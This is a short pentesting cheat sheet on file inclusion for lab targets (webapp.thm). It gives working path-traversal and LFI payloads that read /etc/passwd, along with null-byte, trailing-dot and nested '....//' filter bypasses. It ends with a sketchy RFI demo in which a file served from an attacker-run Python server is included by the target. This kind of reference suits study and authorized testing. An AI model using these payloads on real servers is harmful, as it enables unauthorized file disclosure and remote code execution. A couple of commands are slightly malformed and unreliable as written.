File inclusion

See also the focused Path Traversal cheatsheet for bypass tricks (encoded, nested, null byte, base-dir-prefix) and LFI→RCE upgrades (PHP wrappers, log poisoning).

File Inclusion Attack is an attack in which an attacker tricks a web server to execute certain scripts and include a sensitive file from the server or include malicious files remotely to the server with the purpose of performing even more attacks.

There are two types of File Inclusion Attacks: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI attacks allow attackers to access unauthorized or sensitive files available on the web server while RFI attacks allow attackers to execute malicious files on the web server by making use of the “include” functionality.

File Inclusion Vulnerabilities can be prevented by properly validating user input and ensuring that user input is not passed directly to file include functions.

Path Traversal

Directory traversal attempt enables attackers to view restricted files and sometimes also execute commands on the targeted server. This might include application code and data, credentials for back-end systems, and sensitive operating system files and flags.

http://webapp.thm/get.php?file=../../../../etc/passwd

Local File Inclusion (LFI)

Caused by programming mistakes and lack of awareness. Some PHP functions that may cause LFI vulns:

• include
• require
• include_once
• require_once

http://webapp.thm/get.php?file=/etc/passwd

Using Null byte

The null byte file inclusion vulnerability in PHP 5.3.4 refers to a security issue where an attacker could use null bytes (represented by %00) to manipulate file paths used by PHP’s filesystem functions. It works kinda like comment, everything after it is ignored.

/lab3.php?file=../../../../../etc/passwd%00

Current directory trick

if a web application filters access to /etc/passwd, an attacker could try to bypass this filter by appending /. at the end of /etc/passwd, resulting in /etc/passwd/.. This could potentially allow an attacker to access sensitive files on the server.

/lab4.php?file=../../../../etc/passwd/.

Bypassing filters

Application could replace ../ with empty string.

....//....//....//....//etc/passwd/.

Other

• Using cookies
• change request from post to get or otherwise

Remote File Inclusion - RFI

Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remote file on a web server. This can happen when a web application uses user input to construct the path of a file to include without properly validating or sanitizing the input.

An attacker could exploit this vulnerability by providing a URL as input that points to a malicious file on a remote server. The web application would then include this file and execute its contents, potentially allowing the attacker to gain unauthorized access or control over the server.

Demonstration

python -m http-server

create file file.txt

use http:ip:port/file.txt